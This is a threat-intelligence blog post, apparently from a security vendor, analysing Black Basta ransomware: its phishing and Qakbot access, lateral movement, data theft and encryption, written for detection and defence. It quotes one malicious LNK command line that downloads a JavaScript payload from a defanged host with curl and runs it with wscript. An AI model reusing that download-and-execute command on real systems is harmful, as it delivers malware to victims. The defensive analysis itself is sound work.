Black Basta Ransomware: What You Need to Know

Overview

Black Basta is a ransomware group operating as ransomware-as-a-service (RaaS), first spotted in April 2022. It is known to use double extortion techniques where the group demands payment for the decryption and non-release of stolen data. Earlier versions of Black Basta share many similarities with Conti Ransomware.

A wide range of industries and critical infrastructure in North America, Europe, and Australia have been impacted by Black Basta. To date, 500+ organizations have been affected globally by Black Basta affiliates gaining initial access through common methods like phishing, Qakbot, Cobalt Strike, and exploitation of known vulnerabilities. Once inside, the bad actors move laterally within the network to identify critical systems and data before deploying ransomware. Black Basta has been associated with the FIN7 threat actor due to similarities in custom modules for evading Endpoint Detection and Response (EDR) systems.

Tools Used and Flaws Exploited

A list of known tools that the Black Basta group abused includes malware, adversary emulation, and legitimated tools:

Black Basta is also known to exploit various vulnerabilities for initial access, privilege escalation, and lateral movement. Here is the list of vulnerabilities exploited by Black Basta:

Technical Analysis

The Black Basta infection chain usually starts with a spear phishing email campaign that delivers a malicious link or attachment to the victim. Other initial infection vectors, like exploitation of vulnerabilities and remote desktop protocol (RDP), were also used by this threat actor.

Downloaded zip archives contain malicious .lnk(shortcut) or an Excel file that downloads and executes Qakbot malware.

/q /c MD "%APPDATA%\xx\xxxx" && curl.exe --output %APPDATA%\xx\xxxx\qakbot.js hxxps://xxxxx[.]com/xxx.js && cd "%APPDATA%\xx\xxxx" && wscript qakbot.js

As shown in the command in LNK file, Curl and WScript are used to download and execute the Qakbot JavaScript file.

Upon execution, Qakbot established persistence using autorun entries and scheduled tasks, and for defensive evasion, various PowerShell script is executed to disable and remove the Windows Defender Antivirus protection.

Figure 1: Windows Defender disabled by PowerShell script of Qakbot

Qakbot also established C2 communication with the threat actor to deliver other malware like SystemBC, Cobalt Strike, etc., and legitimate tools such as BITSAdmin, Splashtop, Screen Connect, etc. Based on the TTPs employed by the affiliates of Black Basta, these tools/malware help in different phases of attacks, like Discovery, Privilege escalation, Credential access, and Lateral movement.

Admin credentials are obtained via tools like Mimikatz, which is used for credential dumping and pass-the-hash attacks. CobaltStrike Beacons enable the threat actor to move laterally and deploy ransomware across the network.

Once installed and established on the victim's network, Black Basta first identifies and collects sensitive files for exfiltration. Rclone and WinSCP tools are used to exfiltrate data. Rclone provides the ability to upload data to configured cloud storage provider mostly Mega.

The next stage of the double extortion technique, after the exfiltration of data, is to encrypt endpoints with Black Basta ransomware. The ransomware binary uses vssadmin.exe to delete the shadow copy files to prevent system recovery.

Figure 2: Qualys EDR captures vssadmin used to delete shadow copy files

As depicted in the screenshot below, bcdedit.exe is leveraged to reboot the system in safe mode to disable endpoint defenses and start the operating system with a limited set of drivers and services.

Figure 3: Qualys EDR captures bcdedit used to reboot the system in safe mode

Once the system is rebooted in safe mode, Black Basta uses the ChaCha20 algorithm to encrypt files. The ChaCha20 encryption key is then encrypted with a public RSA-4096 key that is included in the executable.

It will also drop *.jpg and *.ico files on the %temp% directory and use registry modification to change the desktop background and file icon after encryption. The following are the registries that have been created/modified:

Figure 4: Registry Modification to change Desktop Background and encrypted files Figure 5: Desktop background on victim’s system after encryption

The ransomware then generates multiple instances of a file, either named "readme.txt" or "instructions_read_me.txt" depending on the variant, which includes the following ransom note:

Figure 6: Ransom note of the Black Basta Ransomware

Hunting Queries

Qualys Endpoint Detection and Response**(EDR)** customers use these hunting queries to detect suspicious activities associated with Black Basta Ransomware. For any hits, investigate the file modifications, network connections, child/parent processes, and cross-process injections. Qualys also recommends tuning hunting queries for any false positives as per the customer environment.

MITRE ATT&CK Techniques

Indicators of Compromise

Stay to the "Left of Boom" of Emerging Threats

Get notified of the latest threat intelligence, vulnerabilities, and cybersecurity updates.

Subscribe to the Qualys blog.